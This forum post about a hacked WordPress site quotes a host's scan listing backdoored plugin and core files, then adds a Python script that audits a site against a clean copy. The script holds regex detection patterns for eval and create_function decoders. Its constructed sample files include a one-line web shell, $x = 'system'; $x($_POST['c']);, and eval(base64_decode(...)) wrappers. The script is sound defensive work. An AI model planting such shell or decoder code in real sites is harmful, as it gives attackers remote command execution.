Reply To: Pharma Hack


#1067

Bill Hand
Member


My domain host did a scan of my site last night and sent me this email. I ended up purchasing Sitelock so they would not shut down my site. This is just a partial list of the files they say were infected:

“A scan of your account has found the following malicious or infected files present 

wp-content/plugins/revslider/general.php: JCDEF.Obfus.CreateFunc.BackDoorEval-24.UNOFFICIAL FOUND
wp-content/plugins/revslider/temp/index_backup.php: JCDEF.Obfus.CreateFunc.BackDoorEval-18.UNOFFICIAL FOUND
wp-content/plugins/contact-form-7/general.php: JCDEF.Obfus.CreateFunc.BackDoorEval-26.UNOFFICIAL FOUND
wp-content/plugins/cats-jobsite/meta.php: JCDEF.Obfus.CreateFunc.BackDoorEval-26.UNOFFICIAL FOUND
wp-content/plugins/bwp-google-xml-sitemaps/load.php: JCDEF.Obfus.CreateFunc.BackDoorEval-25.UNOFFICIAL FOUND
wp-content/plugins/w3-total-cache/lib/Microsoft/Http/Response/Stream_indesit.php: JCDEF.Obfus.CreateFunc.BackDoorEval-18.UNOFFICIAL FOUND
wp-content/plugins/w3-total-cache/lib/W3/Cdn/Base_bck_old.php: JCDEF.Obfus.CreateFunc.BackDoorEval-18.UNOFFICIAL FOUND
wp-content/plugins/w3-total-cache/inc/options/support/select_ver1.php: JCDEF.Obfus.CreateFunc.BackDoorEval-18.UNOFFICIAL FOUND
wp-content/plugins/w3-total-cache/ini/s3-sample-policy_backup.php: JCDEF.Obfus.CreateFunc.BackDoorEval-18.UNOFFICIAL FOUND
wp-content/plugins/wordpress-seo/meta.php: JCDEF.Obfus.CreateFunc.BackDoorEval-26.UNOFFICIAL FOUND
wp-content/plugins/underconstruction/meta.php: JCDEF.Obfus.CreateFunc.BackDoorEval-25.UNOFFICIAL FOUND
wp-content/plugins/quick-pagepost-redirect-plugin/locale.php: JCDEF.Obfus.CreateFunc.BackDoorEval-24.UNOFFICIAL FOUND

<snip>

/home/users/web/b741/ipg.fullergrpcom/2014/wp-content/uploads/quarantine/F25NS.F25NS.L2hlcm1lcy9ib3NvcmF3ZWIxNTUvYjc0MS9pcGcuZnVsbGVyZ3JwY29tLzIwMTQvd3AtY29udGVudC90aGVtZXMvYXR0aXR1ZGUtcHJvLTEuN25ldy9mdW5jdGlvbnMucGhw1.GOTMLS: SiteLock-PHP-INJECTOR-1-et.UNOFFICIAL FOUND
/home/users/web/b741/ipg.fullergrpcom/2014/wp-content/uploads/quarantine/F15Ji.F15Ji.L2hlcm1lcy9ib3NvcmF3ZWIxNTUvYjc0MS9pcGcuZnVsbGVyZ3JwY29tLzIwMTQvd3AtY29udGVudC90aGVtZXMvYXR0aXR1ZGUtcHJvLW9sZDIwMTQvZnVuY3Rpb25zLnBocA3.GOTMLS: SiteLock-PHP-INJECTOR-1-et.UNOFFICIAL FOUND
wp-admin/media-upload_noversion.php: JCDEF.Obfus.CreateFunc.BackDoorEval-23.UNOFFICIAL FOUND
wp-admin/admin-media.php: JCDEF.Obfus.CreateFunc.BackDoorEval-26.UNOFFICIAL FOUND
wp-admin/js/gallery_bck_old.php: JCDEF.Obfus.CreateFunc.BackDoorEval-23.UNOFFICIAL FOUND
wp-admin/includes/template_prevv1.php: JCDEF.Obfus.CreateFunc.BackDoorEval-23.UNOFFICIAL FOUND
wp-admin/includes/class-wp-locale.php: JCDEF.Obfus.CreateFunc.BackDoorEval-23.UNOFFICIAL FOUND
wp-admin/css/color-picker-rtl_backup.php: JCDEF.Obfus.CreateFunc.BackDoorEval-23.UNOFFICIAL FOUND
wp-admin/user/user-edit_new.php: JCDEF.Obfus.CreateFunc.BackDoorEval-23.UNOFFICIAL FOUND

<snip>

Due to the potential for abuse in this malware, and to protect your site content from further damage, we will have to suspend website services for your account, if this is not addressed within 24 hours. Please remove/replace the malicious files as appropriate, through FTP or the file manager.

I would recommend deleting and republishing your entire site from a clean copy; this should then erase any other code which may have been injected into your pages to allow ‘back-door’ access by unauthorized people.

Most importantly, you need to make sure any applications in your account are completely up-to-date as far as versions, security patches, etc. are concerned. This applies not just to the core application, but also plugins, themes, modules, etc. ** If this is not done, your account will remain vulnerable to future attacks of this kind. **

In addition, you should immediately change your password through the control panel for the account. You should choose a ‘strong’ password, which includes upper- and lower-case letters, numbers and special characters such as hyphens, and is at least eight characters long. This will help reduce the chance of this happening again.

Other possible causes include:
- a computer infected by viruses, which is controlled by hackers. In this situation, your uploads may also get infected.
- poor scripts and/or applications, which allow hackers to insert various malformed queries to remotely execute code
- virus-affected theme selection for applications
- installing applications, add-ons or modules which are downloaded from third-party locations and may be infected.

Please let us know when you have addressed the malicious files.”

I can see where your plugin quarantined the two files listed as PHP Injector. I was wondering whether the rest of the files were false positives or whether they were really infected. I assume Sitelock has cleaned these files now.

If you can show me how to attach a file I can send the one you requested. Hopefully the issue has been resolved.
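The host's email above recommends republishing from a clean copy; the scan list itself shows the two things worth checking before trusting any file: whether it exists in a clean install at all (names such as template_prevv1.php, gallery_bck_old.php and media-upload_noversion.php sit beside real core files), and whether its contents carry the create_function/eval decoder chains the "CreateFunc.BackDoorEval" labels point at. The following Python script is an added example, not code from the original post, from SiteLock or from the plugin's author. It assumes you have a known-clean copy of the same WordPress, plugin and theme versions to diff against; the regexes are my own assumption of what such a scanner rule matches, since the real signature is not published; and the two sample trees it builds are constructed inline, not real site contents.

```python
"""Audit a suspect WordPress tree against a clean copy (added example)."""
import hashlib
import re
import tempfile
from pathlib import Path, PurePosixPath
from typing import Dict, List, Optional, Tuple

# Content heuristics. The scanner's "Obfus.CreateFunc.BackDoorEval" rule is
# not public; these regexes are an assumption of what such a rule looks for.
SIGNATURES = {
    "create_function": re.compile(r"\bcreate_function\s*\(", re.I),
    "eval_decoder": re.compile(r"\beval\s*\(\s*(?:base64_decode|gzinflate|gzuncompress|str_rot13|strrev)\s*\(", re.I),
    "preg_replace_e": re.compile(r"\bpreg_replace\s*\(\s*['\"][^'\"]*/[a-z]*e[a-z]*['\"]", re.I),
    "dynamic_call": re.compile(r"\$\w+\s*\(\s*\$_(?:GET|POST|REQUEST|COOKIE)\b", re.I),
}


def find_signatures(path: Path) -> List[str]:
    """Names of SIGNATURES that match a PHP file's contents (empty for non-PHP)."""
    if path.suffix.lower() not in {".php", ".phtml", ".inc"}:
        return []
    text = path.read_text(encoding="utf-8", errors="replace")
    return [name for name, rx in SIGNATURES.items() if rx.search(text)]


def relative_files(root: Path) -> Dict[str, Path]:
    return {p.relative_to(root).as_posix(): p for p in root.rglob("*") if p.is_file()}


def decoy_of(rel: str, clean: Dict[str, Path]) -> Optional[str]:
    """If rel is '<legit name>_<suffix>.php' beside a clean file of that name, return that file."""
    p = PurePosixPath(rel)
    if p.suffix.lower() != ".php":
        return None
    stem = p.stem
    while "_" in stem:  # template_prevv1 -> template, gallery_bck_old -> gallery_bck -> gallery
        stem = stem.rsplit("_", 1)[0]
        for cand in clean:
            c = PurePosixPath(cand)
            if c.parent == p.parent and c.stem == stem:
                return cand
    return None


def audit(suspect_root: Path, clean_root: Path) -> Dict[str, list]:
    """Diff suspect against clean by SHA-256, then run the content heuristics on every file."""
    suspect, clean = relative_files(suspect_root), relative_files(clean_root)
    report = {"added": [], "modified": [], "missing": [], "obfuscated": [], "decoy_names": []}
    for rel, path in sorted(suspect.items()):
        if rel not in clean:
            report["added"].append(rel)
            mimic = decoy_of(rel, clean)
            if mimic:
                report["decoy_names"].append((rel, mimic))
        elif hashlib.sha256(path.read_bytes()).digest() != hashlib.sha256(clean[rel].read_bytes()).digest():
            report["modified"].append(rel)
        sigs = find_signatures(path)
        if sigs:
            report["obfuscated"].append((rel, sigs))
    report["missing"] = sorted(set(clean) - set(suspect))
    return report


# Constructed sample trees (not real site contents): a tiny clean WordPress
# subset, and a suspect copy carrying the kinds of files the scan listed.
CLEAN_FILES = {
    "wp-admin/includes/template.php": "<?php\nfunction demo_template() { return 'ok'; }\n",
    "wp-admin/js/gallery.js": "(function () { /* benign */ })();\n",
    "wp-content/plugins/revslider/revslider.php": "<?php\n/* Plugin Name: Demo */\n",
}
INJECTED = {
    # decoy copy of a core file: create_function wrapping eval(base64_decode(...));
    # the base64 decodes to phpinfo(); and is harmless
    "wp-admin/includes/template_prevv1.php":
        "<?php\n$f = create_function('', 'eval(base64_decode(\"cGhwaW5mbygpOw==\"));');\n$f();\n",
    # decoy beside gallery.js: variable-function call on request input
    "wp-admin/js/gallery_bck_old.php": "<?php\n$x = 'system'; $x($_POST['c']);\n",
    # legitimate plugin file with a decoder chain appended
    "wp-content/plugins/revslider/revslider.php":
        "<?php\n/* Plugin Name: Demo */\n$p = 'constructed';\neval(gzinflate(base64_decode($p)));\n",
    # new non-PHP upload: reported as added, never as obfuscated
    "wp-content/uploads/2014/photo.jpg": "not really a jpeg\n",
}


def build_demo() -> Tuple[Path, Path]:
    base = Path(tempfile.mkdtemp(prefix="wp-audit-"))
    clean_root, suspect_root = base / "clean", base / "suspect"
    for rel, body in CLEAN_FILES.items():
        for root in (clean_root, suspect_root):
            (root / rel).parent.mkdir(parents=True, exist_ok=True)
            (root / rel).write_text(body)
    for rel, body in INJECTED.items():  # overwrites revslider.php in suspect only
        (suspect_root / rel).parent.mkdir(parents=True, exist_ok=True)
        (suspect_root / rel).write_text(body)
    return suspect_root, clean_root


def demo_report() -> Dict[str, list]:
    return audit(*build_demo())


if __name__ == "__main__":
    print(demo_report())
```

Two caveats when running this on a real account. The hash diff only proves a file differs from the copy you chose to trust, so the clean copy must be a fresh download of the exact same versions, not last month's backup (WP-CLI's `wp core verify-checksums` does the same comparison for core against the official checksums). And the regexes are heuristics: an attacker who assembles function names from string fragments, or hides the decoder inside the ".GOTMLS" quarantine names the scan already reported, will not match them, so an empty "obfuscated" list means nothing was found, not that the tree is clean. Whether a general.php, meta.php or load.php belongs in a given plugin's root is exactly the question the "added" list answers.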